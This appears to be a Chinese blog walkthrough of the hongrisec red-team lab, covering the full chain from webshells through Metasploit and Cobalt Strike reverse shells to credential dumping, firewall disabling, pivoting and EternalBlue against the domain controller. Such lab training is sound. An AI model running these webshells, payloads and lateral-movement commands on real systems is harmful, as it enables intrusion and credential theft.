"感谢您阅读本篇博客!如果您觉得本文对您有所帮助或启发,请不吝点赞和分享给更多的朋友。您的支持是我持续创作的动力,也欢迎留言交流,让我们一起探讨技术,共同成长!谢谢!🚀✨"
网络拓扑图
环境搭建
本机双网卡
65
网段和83
网段是自己本机电脑(虚拟机)中的网卡, 靶机外网的IP
需要借助我们这两个网段之一出网
Kali IP
kali
地址网络适配器选择,为VMnetNAT
模式会通过DHCP 自动获取IP,本机65
网卡会自动分配IP 和靶机win7
同网段
简单来说,桥接模式是独立内网
IP
,NAT
模式则是利用物理机的地址分配一个IP
和物理同一个网段,双网卡就是一个情况,一个网段出网络,一个不出网,不出网IP
为内网网段,或者自定义也是独立的地址
java
192.168.65.148 // kali 地址
扫描win7
出网机开放端口,处于同一个网段可以扫描到
靶机IP
解压后出现后最vmx
后缀文件,打开虚拟机自己弄好 初始密码为hongrisec@2019
已经全部修改为saber.1029
【注意】实际上域环境三台虚拟机的 IP 初始状态就已经被配置为固定的 192.168.52.XXX/24网段(同时已配置好域控 IP 必定为 192.168.52.138),故 VMware 仅主机模式的 VMnet1 网卡应注意也配置为 192.168.52.XXX/24 网段
IP地址
主机 | IP地址 |
---|---|
kali 攻击机 | 192.168.65.148(虚拟机VMnet8网卡) 本机双网卡=WIFi IP+kali IP 65+内部IP 172.28.160.1 |
Win7外网服务器 | 外网IP 192.168.65.154 / 内网IP 192.168.52.143 提权后IP变为65.155 |
Win2003 域成员机 | 192.168.52.141 (不出网IP固定52网段) |
Win2008 DC 域控 | 192.168.52.138 (不出网IP固定52网段) |
攻击机与win7
可以互相ping
通出网,如果出现Ping
不同可能是win7
防火墙未关闭或未开机
Web GetShell
前期信息收集
win7
机器打开小皮服务否则nmap
无法扫描80
端口和 3306
java
arp-scan-l // kali前期使用该命令扫出同有一网段下其他主机
xxxxx // 确定了win7 IP 地地址为 192.168.65.154
扫描win7
外网IP
地址,目标开放了80
3306
端口
java
nmap 192.168.65.154
kali
访问 80端口 phpinfo(
)页面: 自己主机也是可以访问到此页面,本身就是同一个网段,win7
网段是物理机给予的
御剑目录扫描出数据库管理后台和beifen.rar
文件路径
java
http://192.168.65.154/PhpMyAdmin
http://192.168.65.154/beifen.rar
压缩包config.php
给出了数据库的账户密码信息
Yxcms后台模板 Getshell
下载压缩包解压后根据文件夹名称判断是个cms
拼接访问
主页公告信息泄露出了后台管理的地址和账户密码访问后登录即可
java
http://192.168.65.154/yxcms/index.php?r=admin
账户:admimm
密码:123456
登录后台找到前台模板进行编辑写一句话木马蚁剑联机.
选择编辑的文件为index_index.php
猜测应该是网站起始吧最好找路径
java
一句话🐎
<?php eval($_POST["cmd"]);
phpinfo(); // 添加打印函数佐证
echo 'aaaaa'; // 输出 aaaaa
?>
访问网站前台马子上线,掏出蚁剑连接,取得webshell
PHPMyAdmin日志 Getshell
数据库登录如果无密码只能尝试弱口令了,这里是应该前期找文件已经有了密码直接登录就行了
java
账号: root
密码: root
into outfile写入一句话 X
INTO OUTFILE是
MySQL数据库中的一个语句,它可以将查询结果写入到文件中
条件
root
权限- 知道绝对路径
secure_file_priv
没有具体值
使用INTO OUTFILE
将结果写入到文件中
java
SELECT 'Hello, world!' AS message INTO OUTFILE '/path/to/file.txt';
这样文件"/path/to/file.txt"
的内容将变为:
java
Hello, world!
前期通过最高权限的账号登录了,并且源码泄露和phpinfo()
已经知道了绝对路径,查secure_fiel_priv
java
show global variables like "%secure%"; // 查询
value为"null"时,不允许读取任意文件
value为"空"时,允许读取任意文件
这里值为null
无法执行
phpmyadmin 日志写入一句话
使用语句查询路径,这是已经修改过的
java
show global variables like "%general%";
使用命令修改配置开关和路径
java
set global general_log="on"; //开启日志,修改为on
//修改日志路径(在上面提到的phpinfo.php中有泄露路径)
set global general_log_file="C:/phpStudy/WWW/a.php";
利用日志写入一句话木马位置是在网站www 根目录下的a.php
直接访问连接
java
SELECT'<?php eval($_POST["cmd"]);?>'
蚁剑连接成功取得webshell
后渗透
MSF 生成木马上线
Kali
进入MSF
生成shell.exe
java
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.65.148 LPORT=1111 -f exe -o shell.exe
// -p为指定payload,使用msf的payload的时候要和这个相同,
//lhost为Kali ip,lport为 自定义端口,-f为payload类型为exe
拷贝木马使用蚁剑将文件上传到win7
目录下
msf
开启监听回响用handler
模块接收反弹模块
java
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.65.148
set lport 1111
exploit
蚁剑虚拟终端运行exe
文件 MSF成功反弹shell
反弹shell
后先查看当前用户,而后通过getsystem
命令直接进行提权到系统权限
java
getuid // 获取当前用户ID
getsystem // 用于获取系统权限的命令,通常在渗透测试中用于尝试提升当前用户权限至系统管理员权限。
// 这个命令通常在攻击者已经获得一定权限的情况下使用,以获取更高级别的权限。在实际操作中,getsystem命令可能会利用系统中的漏洞或弱点,以获取系统管理员权限
提取用户hash
值
java
run post/windows/gather/smart_hashdump // 提取命令
load kiwi // 加载抓取密码工具
creds_all // 抓取
**hash
**加密方式
java
Windows系统中,哈希密码的格式通常为:用户名称:RID:LM-HASH值:NT-HASH值。
其中,NT-HASH是通过以下步骤生成的:
1. 将明文口令转换成十六进制的格式。
2. 将转换后的十六进制字符串转换成Unicode格式,即在每个字节之后添加0x00。
3. 对Unicode格式的字符串进行MD4加密,生成32位的十六进制数字串
举例来说,如果用户密码为test123,首先将其转换成十六进制的格式为74657374313233
然后转换成Unicode格式为7400650073007400310032003300。
最后,对Unicode字符串7400650073007400310032003300进行MD4加密,
得到NT-HASH值为c5a237b7e9d8e708d8436b6148a25fa1。
这个NT-HASH值可以用于验证用户的身份而无需存储明文密码。
java
run post/windows/manage/enable_rdp // 开启3389远程桌面
nmap
探测属于3389
端口处于开启状态
python
sessions -i # 查看所有会话 这个要回到msf模块下才能看到
sessions 1 # 选择为此ID为1的会话
MSF
权限Shell
至CS
开启CS
物理机Windows
作为客户端 Kali
作为服务端启动
创建监听器,端口号需和IP
需和MSF
监听设置一致,这里的IP
是kali
地址
MSF
执行命令派发
python
bg # 退出回到反弹模块
use exploit/windows/local/payload_inject # 本地漏洞利用模块payload_inject。这个模块通常用于在目标系统上注入恶意代码或payload
set payload windows/meterpreter/reverse_http # :设置payload 表示在目标系统上使用Meterpreter反向HTTP负载。这将允许建立一个反向连接
set DisablePayloadHandler true #payload_inject执行之后会在本地产生一个新的handler,设置为true表示不重复生成
set lhost 192.168.65.148 #公网vps ip
set lport 80 #监听端口需和CS设置一直
set session 1 #派发session 为1 也就是第一个会话 通过会话列表可以查看
exploit
CS
客户端成功收到反弹shell
CS 生成木马上线
CS
上传非常简单,参考前文过程,生成的木马通过前文的蚁剑上传win7
运行即可,上线,后续对win7
信息收集和横向移动其他域内其他主机
java
蚁剑下操作
dir // 列出当前目录下所有文件
.\beacon.exe // 运行木马文件 CS 成功上线
提权system
-
svc-exe 提权
1.创建一个以system权限启动的程序,这个程序的作用是连接指定的命名管道。
2.创建一个进程,并让进程创建命名管道。
3.让之前的以system权限启动的程序启动并连接这个命名管道。
4.利用ImpersonateNamedPipeClient()函数生成system权限的token。
5.利用system权限的token启动cmd.exe
信息收集
java
sleep 0 // 修改心跳速度为0 立马响应
shell systeminfo // 查看主机系统详细信息
查看进行和防火墙开启状态是为了判断是是否有防护软件,但是显然是没有的,不然CS
生成无免杀的马子是不能上传到win7
服务器
java
shell tasklist // 查看被控主机进程列表
java
shell netsh firewall show state // 查看防火墙状态是否开启,操作模式为禁用代表防火墙为关闭状态
出现命令提示:
Microsoft已经将防火墙管理工具从"netsh firewall"迁移到了"netsh advfirewall firewall"。
这种更改可能是为了提高安全性、功能性或性能等方面的考虑
java
shell netsh advfirewall set allprofile state off // 完全关闭防火墙命令
域信息收集
java
shell net config Workstation // 查看域信息
java
shell view // 查看当前域内列表,点击上方定位圆圈就可以看到
java
net dclist // 查看域控列表
抓取凭证hash
win7
主机3个用户账户密码
抓取明文密码
CS
权限shell
至MSF
MSF
开启监听模块,使用一个端口进行监听
java
msfconsole // 开启MSF
use exploit/multi/handler // 使用监听模块
set payload windows/meterpreter/reverse_htpp // 反向连接 CS将得到的权限反弹至MSF,协议和监听器一致
set lhost 0.0.0.0 // IP地址为任意的 任意地址流量都可以反弹
set lport 6666// 端口和监听器设置一致
run // 开启监听
CS
这里是已经通过反向木马得到了shell
,生成的木马监听器就是HTTP
的,所以权限给msf
时,新建的监听器还是HTTP
CS
在需要委派的权限主机右键新建会话,则选择新的监听器为我们创建的
横向移动
横向渗透,使攻击机利用win7
做跳板直接通讯到域控,利用win7
为媒介
kali 攻击机 | 192.168.65.148 |
---|---|
Win7外网服务器 | 外网IP 192.168.65.154 / 内网IP 192.168.52.143 |
Win2008 DC 域控 | 192.168.52.138 (不出网IP固定52网段) |
MSF
MSF
路由+Socks
代理通讯
横向渗透前,将win7
作为跳板机,将其内网52
网段添加到路由,利用msf
路由和socks
配置让同一网段的机器可以通讯到
java
run post/multi/manage/autoroute // 在当前会话自带添加路由 (攻击机添加一个网段和被控主机一个网段 52网段)
run autoroute -p // 查看当前路由 已经添加好了52网段
设置proxychains
代理,,现在只是msf
工具以使用,但的工具还是没有通讯的,所以再次建立一个路由
java
bg // 退回msfshell模式
use auxiliary/server/socks_proxy // 使用socks代理 // 改名字了和之前小迪做的不一样
show options // 查看设置
java
set srvhost 127.0.0.1 // 设置代理为本地
set srvport 888 // 有点问题再开了一个代理 端口为888
run // 执行
jobs // 查看后台任务
找到proxychains4.conf
文件因为不会vim
操作起来很不舒服,定位到端口位置,点击x
后可以删除,点击i
开始添加对应的端口号 和前文设置一致
ms17_010
永恒之蓝445
昨晚配置路由和socks
之后正常是kali
是可以接收到52
网段的流量,然后使用nmap
探测开放端口,会探测到445
然后打永恒之蓝得到权限
socks
开启监听一个端口,将此流量转发给msf
因为端口号设置一致,msf添加了路由,所以流量又被带入内网中,在kali
中的工具都可以监听到
java
proxychains nmap -Pn -sT 192.168.52.138
xxxx 发现存在445端口
检测永恒之蓝可能存在的地址
java
search ms17-010
use auxiliary/scanner/smb/smb_ms17_010 // 永恒之蓝漏洞扫描检测模块
set rhosts 192.168.3.21-32 // 检测此IP范围内
run
命令行出现 Host
漏洞可能存在,使用漏洞攻击模块进行攻击
这里域控密码忘记了登录补上.但总的就是这个意思了,先设置跳板机和sosks
进行通讯,而后通过开放的端口利用永恒之蓝去打域控,打下了域控也就是差不多了
java
use exploit/windows/smb/ms17_010_eternalblue // use 0 // 利用模块
set payload windows/x64/meterpreter/reverse_tcp // 设置攻击载荷反向
set lhost 192.168.52.143 // 地址为 跳板机win7地址,因为要通过它去打域控地址 138
set rhosts 192.168.52.138 // 被攻击的地址为域控
set lport 5555 // 随意选择kali一个端口进行监听
run // 运行即可
CS
创建SMB监听器横向
SMB Beacon
相对隐蔽,绕防火墙时可能发挥奇效(系统防火墙默认是允许445
的端口与外界通信的,其他端口可能会弹窗提醒,会导致远程命令行反弹shell失败),此流量封装在SMB
协议中
对DC
域控进行横向移动利用先前抓取的明文密码,配合SMB
监听器,
运行后直接用抓取到的明文去移动直接正向连接域控主机,接下来可以拿域控去打另外一台机器,这是第一种派生方式,第二种beacon
上创建监听,用来作为跳板进行内网穿透 前提是能够通过 shell
之类访问到内网其他主机
横向移动psexec
感觉这个就是拿明文去移动启动机器了,psexec
属于登录命令,在有密码情况下远程登录其他主机执行命令
简单粗暴拿下